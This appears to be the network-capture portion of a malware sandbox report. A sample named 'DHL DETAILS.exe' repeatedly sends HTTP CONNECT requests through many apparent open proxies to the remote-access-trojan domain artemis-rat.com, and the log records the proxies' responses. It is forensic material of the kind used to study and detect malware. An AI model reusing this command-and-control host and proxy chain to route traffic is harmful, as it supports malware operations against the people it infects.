Mar 9, 2024 13:14:15.964212894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.292920113 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
926	192.168.2.5	52997	72.210.221.197	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.964234114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
927	192.168.2.5	53000	170.245.57.228	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.965531111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
928	192.168.2.5	52964	43.131.246.77	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.968780041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
929	192.168.2.5	52984	119.28.4.112	9999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.972038984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
930	192.168.2.5	50491	162.214.170.144	25347	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.988492966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036396027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.036969900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.051846981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
931	192.168.2.5	52949	115.239.234.43	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.990304947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.320828915 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
932	192.168.2.5	53022	129.213.150.205	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.991645098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
933	192.168.2.5	52967	94.177.106.178	2324	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.991664886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
934	192.168.2.5	51690	117.160.250.138	8899	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.993098974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.615556955 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
935	192.168.2.5	52937	202.139.198.15	3030	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.995115042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
936	192.168.2.5	52048	186.96.50.20	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.995356083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.547626972 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
937	192.168.2.5	50498	51.222.241.157	22538	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.000936985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036441088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
938	192.168.2.5	52940	222.255.238.159	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.003160000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.368844032 CET	481	IN	HTTP/1.1 302 Found Date: Sat, 09 Mar 2024 12:14:16 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://ktxcomay.com.vn Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
939	192.168.2.5	52975	182.106.220.252	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.003355980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.355335951 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
940	192.168.2.5	52990	203.19.38.114	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.003356934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.675225019 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.0 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
941	192.168.2.5	52986	94.30.152.172	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.003539085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
942	192.168.2.5	50558	50.63.12.33	45134	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.008907080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036441088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
943	192.168.2.5	52038	35.209.198.222	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.009010077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036449909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
944	192.168.2.5	52010	51.158.105.107	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.009967089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036452055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
945	192.168.2.5	52999	20.111.54.16	8123	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.013849974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.312079906 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Mar 9, 2024 13:14:17.130774021 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
946	192.168.2.5	52900	116.199.168.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.019232035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
947	192.168.2.5	51952	45.11.95.166	6014	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.025055885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.498557091 CET	39	IN	HTTP/1.0 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
948	192.168.2.5	50289	13.81.217.201	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.027621031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.617181063 CET	536	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:17 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 618 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform the
Mar 9, 2024 13:14:17.617232084 CET	274	IN	Data Raw: 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 Data Ascii: m of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Por

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
949	192.168.2.5	52991	80.67.8.6	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.029341936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
950	192.168.2.5	51950	51.38.50.249	9224	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.030303001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.161705017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
951	192.168.2.5	50510	156.232.9.194	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.035092115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.161626101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.177093029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.270883083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
952	192.168.2.5	53023	98.170.57.249	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.042973995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
953	192.168.2.5	50381	195.78.100.162	3629	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.046041012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
954	192.168.2.5	53021	58.234.116.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.046272039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781187057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
955	192.168.2.5	50458	138.68.155.22	19987	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.053564072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
